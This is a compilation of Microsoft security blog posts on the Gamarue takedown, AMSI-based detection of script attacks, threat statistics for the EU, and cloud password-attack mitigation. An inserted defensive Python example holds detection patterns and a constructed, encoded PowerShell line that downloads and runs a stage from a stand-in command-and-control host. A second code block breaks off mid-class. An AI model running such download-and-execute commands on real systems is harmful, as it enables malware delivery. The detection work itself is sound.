Microsoft Exchange Online Protection (EOP) can block Gamarue infections from email using built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Windows Defender Exploit Guard can block malicious documents (such as those that distribute Gamarue) and scripts. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo).

Microsoft is also continuing the collaborative effort to help clean Gamarue-infected computers by providing a one-time package with samples (through the Virus Information Alliance) to help organizations protect their customers.
Microsoft Digital Crimes Unit and Windows Defender Research team
Get more info on the Gamarue (Andromeda) takedown from the following sources:
Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that ‘live off the land’

December 4th, 2017 No comments

Scripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.

Scripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the land: staying away from the disk and using common tools to run code directly in memory. Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps makes them effective vehicles for delivering malicious implants through social engineering, as evidenced by the increasing use of scripts in spam campaigns.

Malicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShell, the de facto scripting standard for administrative tasks on Windows, with the ability to invoke system APIs and access a variety of system classes and objects.

While the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.

Windows 10 provides optics into script behavior through Antimalware Scan Interface (AMSI), a generic, open interface that enables Windows Defender Antivirus to look at script contents the same way script interpreters do, in a form that is both unencrypted and unobfuscated. In Windows 10 Fall Creators Update, with knowledge from years analyzing script-based malware, we've added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.

This unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection (Windows Defender ATP). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.

In this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP machine learning systems make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.

KRYPTON: Highlighting the resilience of script-based attacks

Traditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.

Apart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.

For example, the activity group KRYPTON has been observed hijacking or creating scheduled tasks; they often target system tasks found in exclusion lists of popular forensic tools like Autoruns for Windows. KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.

To illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by John Lambert and the Office 365 Advanced Threat Protection team.

Figure 1. KRYPTON lure document

To live off the land, KRYPTON doesn't drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (wscript.exe) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.

Figure 2. KRYPTON script execution chain through wscript.exe

Exposing actual script behavior with AMSI

AMSI overcomes KRYPTON's evasion mechanisms by capturing JavaScript API calls after they have been decrypted and are ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.

Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

By checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.

Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

PowerShell use by Kovter and other commodity malware

Not only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, Kovter malware uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by a JavaScript (executed by wscript.exe) and passed to powershell.exe as an environment variable.

Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

By looking at the PowerShell payload content captured by AMSI, experienced analysts can easily spot similarities to PowerSploit, a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.

Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Fresh machine learning insight with AMSI

While AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.

As outlined in our previous blog, we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.

Figure 7. Process tree augmented by instrumentation for AMSI data

As shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (winword.exe) to launch PowerShell (powershell.exe). In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware fhjUQ72.tmp, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build expert classifiers for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.

With the instrumentation of AMSI signals added as part of the Windows 10 Fall Creators Update (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. We've also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, ngrams, and specific API invocations, to name a few.

As AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our deep neural networks automatically learn features that are often hidden from human analysts.
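As an added example (not the Windows Defender ATP implementation), the block below peels nested PowerShell base64 layers the way an analyst would when the obfuscated content is in hand, and computes the kinds of script features named above: layer count, entropy, API invocations and n-gram variety. The regex patterns, the sample script and the "suspicious" rule are illustrative assumptions constructed for this example.

```python
"""Peel PowerShell encoding layers and extract script features.

Added example, not the Windows Defender ATP implementation. It shows the kind
of features the article names (count of obfuscation layers, entropy, API
invocations, n-grams) computed on a constructed sample; the patterns and the
'suspicious' rule are illustrative assumptions, not the product's models.
"""
import base64
import math
import re
from collections import Counter
from typing import Dict, List, Optional

# Base64 runs such as those consumed by -EncodedCommand or FromBase64String.
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

# API invocations counted across all layers (ASSUMED, defender-chosen patterns).
API_PATTERNS = {
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "frombase64": re.compile(r"FromBase64String", re.I),
    "reflection": re.compile(r"\[Reflection\.Assembly\]|\.GetType\(", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def shannon_entropy(text: str) -> float:
    """Bits per character of the given text."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _decode_blob(blob: str) -> Optional[str]:
    """Decode one base64 run as UTF-16LE (PowerShell -EncodedCommand) or UTF-8 text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # An ASCII script encoded as UTF-16LE has every odd byte equal to zero.
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        text = raw.decode("utf-16-le")
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    return text if all(ch.isprintable() or ch in "\r\n\t" for ch in text) else None


def peel_layers(script: str, max_layers: int = 10) -> List[str]:
    """Return the script followed by each successively decoded inner layer."""
    layers = [script]
    while len(layers) < max_layers:
        decoded = next((t for t in map(_decode_blob, B64_RE.findall(layers[-1])) if t), None)
        if decoded is None:
            break
        layers.append(decoded)
    return layers


def extract_features(script: str) -> Dict[str, object]:
    """Compute layer count, entropy, API hit counts and trigram variety for a script."""
    layers = peel_layers(script)
    inner = layers[-1]
    api_hits = {name: sum(len(rx.findall(layer)) for layer in layers)
                for name, rx in API_PATTERNS.items()}
    trigrams = Counter(inner[i:i + 3] for i in range(len(inner) - 2))
    reasons = []
    if len(layers) > 1:
        reasons.append("%d encoding layer(s) peeled" % (len(layers) - 1))
    if api_hits["invoke_expression"]:
        reasons.append("dynamic code evaluation")
    if api_hits["download"]:
        reasons.append("network download")
    if api_hits["hidden_window"]:
        reasons.append("hidden window")
    # Illustrative rule: encoding layers combined with evaluation or download activity.
    suspicious = len(layers) > 1 and api_hits["invoke_expression"] + api_hits["download"] > 0
    return {
        "layer_count": len(layers),
        "entropy_outer": round(shannon_entropy(layers[0]), 3),
        "entropy_inner": round(shannon_entropy(inner), 3),
        "api_hits": api_hits,
        "distinct_trigrams": len(trigrams),
        "suspicious": suspicious,
        "reasons": reasons,
    }


def _b64_utf16(text: str) -> str:
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample: a decoder stage wrapping a -EncodedCommand launcher that downloads a stage.
SAMPLE_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2.ps1')"
SAMPLE_LAYER1 = "powershell -w hidden -EncodedCommand " + _b64_utf16(SAMPLE_INNER)
SAMPLE_SCRIPT = ("$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
                 + _b64_utf16(SAMPLE_LAYER1) + "'));Invoke-Expression $s")
SAMPLE_BENIGN = "Get-ChildItem C:\\Temp | Where-Object Length -gt 1MB"

if __name__ == "__main__":
    print(extract_features(SAMPLE_SCRIPT))
```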

Figure 8. Machine learning detections of JavaScript and PowerShell scripts

While these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.

Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity

Detection of AMSI bypass attempts

With AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:

  • Bypasses that are part of the script content and can be inspected and alerted on
  • Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs
  • Patching of AMSI instrumentation in memory

The Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.

During actual attacks involving CVE-2017-8759, Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by Matt Graeber.

Figure 10. Windows Defender ATP alert based on AMSI bypass pattern

AMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.

Figure 11. AMSI bypass code sent to the cloud for analysis

Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks

Provided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.

AMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.

With Windows 10 Fall Creators Update (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.

Apart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.

To benefit from the new script runtime instrumentation and other powerful security enhancements like Windows Defender Exploit Guard, customers are encouraged to install Windows 10 Fall Creators Update.

Read The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advanced attacks, sign up for a free trial.

Stefan Sellmer, Windows Defender ATP Research

with

Shay Kels, Windows Defender ATP Research

Karthik Selvaraj, Windows Defender Research

Additional readings

Microsoft Security Intelligence Report Volume 21 is now available

The latest volume of the Microsoft Security Intelligence Report is now available for free download at www.microsoft.com/sir.

This new volume of the report includes threat data from the first half of 2016 as well as longer term trend data on industry vulnerabilities, exploits, malware, and malicious websites. The report also provides specific threat data for over 100 countries/regions.

Our Featured Intelligence content for this volume of the report includes three deep dive sections:

Protecting cloud infrastructure; detecting and mitigating threats using Azure Security Center:
As organizations move workloads to cloud-based services it is important that security teams keep abreast of changes in their threat posture. New threats can be encountered when adopting solutions that are fully cloud based, or when connecting on-premises environments to cloud services. This section of the report details common threats that organizations may encounter, and explains how security teams can use Azure Security Center to protect, detect, and respond to security threats against Azure cloud-based resources.

PROMETHIUM and NEODYMIUM: parallel zero-day attacks targeting individuals in Europe:
Microsoft proactively monitors the threat landscape for emerging threats, including observing the activities of targeted activity groups. The new report chronicles two activity groups, code-named PROMETHIUM and NEODYMIUM, both of which target individuals in a specific area of Europe. Both attack groups launched attack campaigns in May 2016 using the same zero-day exploit to seek information about specific individuals. Microsoft is sharing information about these groups to raise awareness of their activities, and to help individuals and organizations implement existing mitigation options that significantly reduce risk from these attack groups and other similar groups.

Ten years of exploits: a long-term study of exploitation of vulnerabilities in Microsoft software:
Microsoft researchers conducted a study of security vulnerabilities and the exploitation of the most severe vulnerabilities in Microsoft software over a 10-year period ending in 2015. In the past five years vulnerability disclosures have increased across the entire industry. However, the number of remote code execution (RCE) and elevation of privilege (EOP) vulnerabilities in Microsoft software has declined significantly. The results of the study suggest that while the risk posed by vulnerabilities appeared to increase in recent years, the actualized risk of exploited vulnerabilities in Microsoft software has steadily declined.

There is a lot of other new data in this report that I hope you’ll find useful.

You can download Volume 21 of the Microsoft Security Intelligence Report at www.microsoft.com/sir.

Ken Malcolmson
Executive Security Advisor, Microsoft Enterprise Cybersecurity Group

What’s Been Happening in the Threat Landscape in the European Union

June 14th, 2016 No comments

Recently, I had the opportunity to visit customers in several countries in the European Union (EU). The threat landscape in the EU has been changing rapidly, and in some unpredictable ways. I thought it was time to share some new data and insights based on data from the latest volume of the Microsoft Security Intelligence Report.

I have written about the threat landscape in the EU many times in the past. If you are interested in reading some of these previously published articles, here’s a partial list:

The Latest Picture of the Threat Landscape in the European Union – part 1
The Latest Picture of the Threat Landscape in the European Union – part 2
The Latest Picture of the Threat Landscape in the European Union – part 3
Ransomware is on the Rise, Especially in Europe
The Threat Landscape in the European Union at RSA Conference Europe 2013
European Union check-up: Locations with Lowest Infection Rates in the EU and What We Can Learn From Them
European Union Check-Up: Malicious Websites Hosted in the EU
European Union check-up: Romania still tops the list of most infected in the EU
Cyber-Threats in the European Union: First Half 2012
Cyber-Threats in the European Union
The Threat Landscape Shifts Significantly in the European Union – Part 1
The Threat Landscape Shifts Significantly in the European Union – Part 2
The Threat Landscape Shifts Significantly in the European Union – Part 3

Let’s start by looking at the locations in the EU with the lowest and highest malware encounter rates (ER). ER is the percentage of computers running Microsoft real-time security software that report detecting malware or unwanted software during a given period of time. The worldwide average ER in the fourth quarter of 2015 was 20.8%. As Figure 1 illustrates, the “usual suspects” have the lowest ERs in the EU including Finland (8.6%), Sweden (11.4%), and Denmark (11.7%).

Figure 1: Locations in the EU with the lowest encounter rates in the fourth quarter of 2015 (4Q15)

Figure 2 shows us that the locations with the highest ERs in the EU include Romania (31.3%), Bulgaria (29.8%), and Croatia (27.5%). As high as the ERs for these locations were in the fourth quarter of 2015, they were significantly lower than the countries/regions with the highest ERs in the world during the same period. These locations include Pakistan (63.0%), Indonesia (60.6%), the Palestinian Territories (57.3%), and Bangladesh (57.2%).

Figure 2: Locations in the EU with the highest encounter rates in the fourth quarter of 2015 (4Q15)

You might have noticed the upward ER trend in Figures 1 and 2. This upward trend is even more pronounced when looking at the malware infection rates in the region, as seen in Figures 3 and 4; these are systems that encountered malware and were successfully infected, a measure called computers cleaned per mille (CCM). The worldwide average infection rate in the fourth quarter of 2015 was 16.9 systems infected with malware for every 1,000 scanned by the Malicious Software Removal Tool (MSRT), or 1.69% of the 600 to 700 million systems the MSRT executes on each month. The worldwide infection rate almost tripled from the same period a year earlier. The average infection rate for the 28 countries/regions in the EU during the same period was a CCM of 21.1, or 2.1%. This is a CCM increase of 15.5 from a year earlier.

Figure 3: Locations in the EU with the lowest malware infection rates (CCM) in the fourth quarter of 2015 (4Q15)

Even locations with consistently low malware infection rates saw large increases between the third and fourth quarters of 2015. As seen in Figure 3, Finland’s CCM, for example, nearly quadrupled in the fourth quarter. Figure 4 illustrates the locations with the highest infection rates in the EU, which include Romania (36.4), Croatia (35.2), Spain (34.0), while the worldwide average was 16.9. For context, the locations with the highest CCMs in the world during the same period include Mongolia (93.3), Libya (85.3), the Palestinian Territories (80.0).

Figure 4: Locations in the EU with the highest malware infection rates (CCM) in the fourth quarter of 2015 (4Q15)

You are probably wondering what caused such a rapid increase in infection rates in the EU and worldwide. It would be easy to believe that the threat landscape just got a whole lot worse, but that’s not really the case. Every month, the Microsoft Malware Protection Center typically adds detection capabilities to the MSRT for one or more new families of malware that researchers believe are globally prevalent. Then the MSRT executes on 600 to 700 million systems worldwide. If researchers were correct about the families they added to the MSRT, the MSRT will clean the newly added threats from systems infected with those threats around the world.

Sometimes, like in the fourth quarter of 2015, one of the threats they added detection for was really prevalent and gets cleaned from lots of systems. The worldwide infection rate increased 175.9 percent in the final quarter of 2015, from a CCM of 6.1 in the third quarter to 16.9 in fourth quarter. Almost all of this increase was due to Win32/Diplugem, a browser modifier that shows extra advertisements as the user browses the web. The CCM for Diplugem alone in 4Q15 was 11.7, nine times as high as the CCM for the next most prevalent family, Win32/Gamarue.

As seen in Figure 5, detection for Win32/Diplugem was added to the MSRT in the fourth quarter, and it was removed from more computers in the EU in 4Q15 than any other family by a significant margin. In the EU, Win32/Diplugem was removed from 15.4 computers for every 1,000 computers the MSRT executed on in the fourth quarter, or 1.54% of systems.

Figure 5: The top 10 families of threats cleaned by the MSRT in the EU during the fourth quarter of 2015

One other threat family I will call your attention to is Win32/CompromisedCert. This is the third threat family listed in the top threats cleaned in the EU, in Figure 5. This is a detection for the Superfish VisualDiscovery advertising program that was preinstalled on some Lenovo laptops sold in 2014 and 2015. It installs a compromised trusted root certificate on the computer, which can be used to conduct man-in-the-middle attacks on the computer. This threat was cleaned consistently on systems in the EU throughout 2015. I was surprised to see Win32/CompromisedCert on the top 4 list of threats cleaned in locations like the UK, Germany and the Netherlands.

Almost everyone I talked to during my recent trip to some locations in the EU, was concerned about Ransomware. I wrote an article on Ransomware recently that provides some good context on this type of threat: Ransomware: Understanding the Risk. The data for the last half of 2015 suggests there was a slight increase in the ER for ransomware (0.26 percent in 3Q15, 0.40 percent in 4Q15), but it’s still a fraction of 1 percent and much lower than almost every other category of malware.

In the EU, 18 of the 28 countries had Ransomware encounter rates above the worldwide average as Figure 6 illustrates. Systems in Portugal and Italy encountered Ransomware more than any other locations in the EU. This isn’t surprising – I wrote that Ransomware was on the rise, especially in Europe, years ago. The good news is that Ransomware is one of the least encountered threats in the EU as Figure 7 illustrates.

Figure 6: Ransomware Encounter Rates in the EU during the fourth quarter of 2015

Figure 7 shows us which locations in the EU have the highest and lowest encounter rates across different threat categories. The numbers in red are the highest ERs for that threat category, while the numbers in pink are above the worldwide average. The numbers that aren’t shaded are the lowest ERs for that threat category and are below the worldwide average. With this data, I find it especially noteworthy that every location in the EU, with the exception of Finland, had encounter rates for Exploits above the worldwide average, in many cases two or three times higher. A contributing factor is that the Angler exploit kit (JS/Axpergle) was one of the most encountered threats in the EU in 2015, being encountered by more than 1% of systems in the fourth quarter of 2015.

Figure 7: Encounter Rates for Threat Categories in the EU during the fourth quarter of 2015

From drive-by download URL data provided by Bing, Slovakia and Cyprus hosted the highest number of drive-by download pages per 1,000 URLs in the EU, as seen in Figure 8.

Figure 8: Drive-by download pages indexed by Bing at the end of the fourth quarter of 2015, per 1,000 URLs in each country/region

Guidance to Protect Your Organization

Based on the specific threats we see in the EU, let me give you some guidance to help protect your organization.

  • Security Updates: given most locations in the EU have above average Exploit encounter rates and that the Angler exploit kit (JS/Axpergle) is a top threat encountered in the region, it’s critical for organizations to keep all software up to date with the latest security updates. This isn’t just your Microsoft software; it includes software from Adobe, Oracle, and every other vendor your organization procures software from. If you have vendors that don’t provide you with security updates, your organization isn’t getting its money’s worth. Data from the new Security Intelligence Report on industry vulnerability disclosures shows us that there were 6,384 vulnerabilities disclosed across the industry in 2015 alone, which is a typical year. Organizations need to patch all of those vulnerabilities in their environment to protect themselves from the high level of exploit activity in the EU. Demand security updates from all of your vendors.
  • Up-to-date Anti-Malware Software: don’t let security experts convince you that anti-virus software is a waste of time. No software or hardware can protect your organization from all current and future threats. But running up-to-date anti-malware software from a trusted vendor will protect your organization from millions of current and future threats. We know from many studies over the years, using data from hundreds of millions of systems around the world, that systems which run current anti-malware solutions have significantly lower malware infection rates than those that don’t (as seen in Figure 9).
    Figure 9: Infection rates for protected and unprotected computers in 2015
  • Ransomware: if you are trying to evaluate the risk to your organization that Ransomware poses, keep calm and stay vigilant; this is a low probability, high impact threat where there are numerous mitigations available. The best mitigation is maintaining current offline backups for critical data. Check out these two articles: Ransomware: Understanding the Risk, How to Deal with Ransomware.
  • Malicious Websites: one of the best ways organizations can protect their users from malicious and compromised websites is by mandating the use of web browsers with appropriate protection features built in and by promoting safe browsing practices. For in-depth guidance, see this article.
  • Modern Operating Systems and Browsers: the latest data clearly shows us that using a modern operating system, like Windows 10, and a modern browser, like Microsoft Edge, provides significant protection against the type of modern day threats I discussed in this article. If you haven’t done so yet, evaluate these newer products versus the older products your organization might be using. On older operating systems, like Windows 7, use the Enhanced Mitigation Experience Toolkit (EMET), if possible, to minimize exploitation of vulnerabilities in the software in your environment. See technet.microsoft.com/security/jj653751 for more information.
  • Regional Security Experts’ Advice: there are six things that security experts in the consistently least infected countries/regions in the world (like Finland) tell us help them. Here’s the list:
    • Strong public – private partnerships that enable proactive and response capabilities
    • CERTs, ISPs and others actively monitoring for threats in the region enable rapid response to emerging threats
    • An IT culture where system administrators respond rapidly to reports of system infections or abuse is helpful
    • Enforcement policies and active remediation of threats via quarantining infected systems on networks in the region is effective
    • Regional education campaigns and media attention that help improve the public’s awareness of security issues can pay dividends
    • Low software piracy rates and widespread usage of Windows Update/Microsoft Update has helped keep infection rates relatively low

This was a long article, but I hope it was worth the time you spent reading it. You can get more details on every country/region in the EU and almost a hundred more locations, by visiting http://microsoft.com/sir and clicking on Regional Threat Assessment.

Tim Rains
Director, Security

Protecting Identities in the Cloud: Mitigating Password Attacks

May 5th, 2016 No comments

We just released a new volume of the Microsoft Security Intelligence Report. Included in the report, for the first time, is security data from the Microsoft cloud that reveals how we are leveraging an intelligent security graph to inform how we protect endpoints, better detect attacks and accelerate our response, to help protect our customers.

In November we outlined Microsoft’s new approach to how we Protect, Detect and Respond to security threats. We have been evolving our ability to get real-time insights and predictive intelligence across our network so we can stay a step ahead of the threats and protect customers.

The challenge is to correlate our security data with our threat intelligence data. To do this, we collect trillions of signals from billions of sources to build an intelligent security graph that can learn from one area and apply across the Microsoft platform. The intelligent security graph is powered by inputs we receive across our endpoints, consumer services, commercial services and on-premises technologies.

The new Security Intelligence Report contains many insights from this data and analysis. Here are some examples:

  • From a sensor network made up of hundreds of millions of systems running Microsoft anti-malware software, the data shows us that:
    • The number of systems that encountered malware in 2015 increased in the second half of the year. The worldwide encounter rate increased to 20.5% by the end of 2015, an increase of 5.5% from six months earlier.
    • The locations with the highest encounter rates were Pakistan, Indonesia, the Palestinian territories, Bangladesh, and Nepal which all had encounter rates above 50%.
    • Exploit kits accounted for four of the 10 most commonly encountered exploits during the second half of 2015. The Angler exploit kit was the most commonly encountered exploit kit family.
    • Although ransomware had relatively low encounter rates (worldwide ER for ransomware in the first quarter of 2015 was 0.35 percent and 0.16 percent in the second quarter), its use in ransomware-as-a-service kits and targeted attacks is increasing.
  • SmartScreen Filter is a feature in Internet Explorer and Microsoft Edge that offers users protection against phishing sites and sites that host malware. Based on phishing data from SmartScreen:
    • Phishing sites that targeted online services received the largest share of impressions during the period, and accounted for the largest number of active phishing URLs
    • Sites that targeted financial institutions accounted for the largest number of active phishing attacks during the period

As I mentioned, we’ve published cloud service security data in this Security Intelligence Report for the first time. Let me share some of that data with you and why we are excited about how the cloud is improving the insights from our intelligent security graph.

Mitigating Password Attacks

The massive scale of Microsoft’s cloud enables us to gather an enormous amount of intelligence on malicious behavior, which in turn allows us to prevent the compromise of Microsoft Accounts and Azure Active Directory accounts, and block the use of leaked or stolen credentials.

Azure Active Directory provides single sign-on to thousands of cloud (SaaS) apps such as Office 365, Workday, Box, Google Apps and more, and access to web apps organizations run on-premises, and Microsoft Accounts are used by consumers to sign into services like Bing, Outlook.com, OneDrive, Skype, and Xbox LIVE.
The scale of these services provides tremendous insight into attackers’ efforts to compromise the user accounts of consumers and enterprises.
  1. At the end of 2015, Azure Active Directory was being used by 8.24 million tenants with over 550 million users.
  2. Azure Active Directory averaged over 1.3 billion requests per day.
  3. Every day, Microsoft processed over 13 billion logins from hundreds of millions of Microsoft Account users.

To prevent and mitigate attacks on the consumers and organizations using these services, we use a multi-layered system of protection mechanisms. The keystone of these protection systems is machine learning. Every day, our machine learning systems process more than 10 terabytes of data, including information on over 13 billion logins from hundreds of millions of Microsoft Account users.

We combine this with other protection algorithms and data feeds from:

  • The Microsoft Digital Crimes Unit
  • The Microsoft Security Response Center
  • Phishing attack data from Outlook.com and Exchange Online
  • Information acquired by partnering with academia, law enforcement, security researchers, and industry partners around the world

All this data helps us create a comprehensive protection system that helps keep our customers’ accounts safe. The system deflects tens of thousands of location-based attacks per day, and automatically blocks tens of thousands of requests each day that use credentials that have likely been stolen or leaked. Microsoft Accounts that are determined to be compromised are automatically entered into an account recovery process that allows only the rightful owner to regain sole access to the account.

Multiple algorithms look at a wide range of data produced by our systems, working in real time to stop attacks before they are successful and, retroactively, to swiftly remediate accounts for which an attack worked and remove access from a bad actor. These are complemented by simpler controls such as incorrect-password lockout and location-based blocking.

The Advantages of Machine Learning

Microsoft’s machine learning systems use various data points to determine when an account login attempt, even with a valid password, is likely fraudulent.

For Microsoft Accounts, these login attempts are blocked until a second factor of authentication is provided. For Azure Active Directory, Identity Protection allows administrators to create policies that do the same, requesting MFA or outright blocking the attempt based on the risk score of the login.

One of the factors the machine learning system uses to block login attempts is whether the location of the login attempt is a familiar location to the legitimate user.
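
To make that decision concrete, here is an added example (my own illustration, not Microsoft’s code and not the actual Microsoft Account or Azure Active Directory logic) of the sign-in policy described above, run over a few constructed sign-in records: a valid password from an unfamiliar location is stepped up to a second factor, a credential known to be leaked is blocked outright, and a burst of wrong passwords triggers lockout. The country codes, thresholds, the `leaked` flag and the `SignIn`/`AccountProtection` names are assumptions for illustration; a real system derives location from the client IP and matches credentials against its own leaked-credential feeds.

```python
"""Risk-based sign-in evaluation over constructed sign-in records.

Added example, not Microsoft's code. It models the policy described in the
post: a valid password from an unfamiliar location is stepped up to a second
factor, a credential known to be leaked is blocked outright, and repeated
wrong passwords trigger lockout. Feature set, thresholds and country codes
are assumptions for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5                    # assumption: failures before lockout
LOCKOUT_WINDOW = timedelta(minutes=10)   # assumption: window for counting them


@dataclass
class SignIn:
    ts: datetime
    user: str
    country: str            # a real system derives this from the client IP
    password_ok: bool
    leaked: bool = False    # assumption: credential matched a leaked-credential feed


class AccountProtection:
    def __init__(self, familiar_locations):
        # user -> set of countries the legitimate user has signed in from before
        self.familiar = defaultdict(set, {u: set(c) for u, c in familiar_locations.items()})
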